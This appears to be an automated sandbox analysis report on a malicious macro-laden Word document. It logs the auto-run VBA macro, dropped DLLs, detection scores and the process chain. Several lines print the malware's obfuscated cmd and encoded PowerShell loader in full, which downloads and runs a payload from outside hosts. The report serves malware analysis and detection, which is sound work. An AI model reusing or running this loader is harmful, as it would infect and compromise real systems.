Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002769FD 9_2_002769FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002713FB 9_2_002713FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002883C9 9_2_002883C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002783CE 9_2_002783CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00289DC4 9_2_00289DC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00275FD2 9_2_00275FD2
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: sample2.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module D5qbbm81zox5, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: sample2.doc OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Db_bh30\Yf5be5g\A69S.dll F75EEE1A8FADBBC4EA30CAFA8882728ED64B0C828AEC863159D5D7224A12DF89
Yara signature match
Source: 00000004.00000002.2090964230.00000000001C6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.2091072841.0000000001B56000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: A69S.dll.4.dr Static PE information: Section: .rsrc ZLIB complexity 0.995064871652
Source: rundll32.exe, 00000005.00000002.2097896058.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094110049.0000000001D50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095897108.0000000001DA0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@16/8@3/6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0027BB13 CreateToolhelp32Snapshot, 9_2_0027BB13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString, 6_2_10002D70
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ample2.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBFF4.tmp Jump to behavior
Source: sample2.doc OLE indicator, Word Document stream: true
Source: sample2.doc OLE document summary: title field not present or empty
Source: sample2.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: .."..................................... .#.......#............. .......................#.........................".....h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........_............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....................+..j......................u.............}..v....h.......0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j..... u...............u.............}..v............0................._............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......................u.............}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......_...............u.............}..v....X.......0................._............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....#...............[..j......................u.............}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............[..j..... u...............u.............}..v............0...............h._............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....(................u.............}..v............0................._............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....+..................j.....(................u.............}..v............0................._............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Control_RunDLL
Source: sample2.doc Virustotal: Detection: 69%
Source: sample2.doc Metadefender: Detection: 47%
Source: sample2.doc ReversingLabs: Detection: 75%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZ
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hvayvymqsut\qurpqzzbqs.opz',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxohzthmdfatnoq\lqaarocqybnpxa.zgv',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bajrh\emiy.exu',Control_RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Control_RunDLL Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hvayvymqsut\qurpqzzbqs.opz',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxohzthmdfatnoq\lqaarocqybnpxa.zgv',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bajrh\emiy.exu',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000006.00000002.2097367242.000000001000D000.00000002.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2097865298.000000001B2C0000.00000002.00000001.sdmp
Source: sample2.doc Initial sample: OLE summary subject = Branding Tactics Investment Account Public-key District Cambridgeshire transmitter Intelligent Concrete Bike Unbranded Metal Tuna Practical Plastic Tuna Liaison

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: sample2.doc Stream path 'Macros/VBA/Ewjwp7hpm073' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Ewjwp7hpm073 Name: Ewjwp7hpm073
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Ewjwp7hpm073 Name: Ewjwp7hpm073
Obfuscated command line found
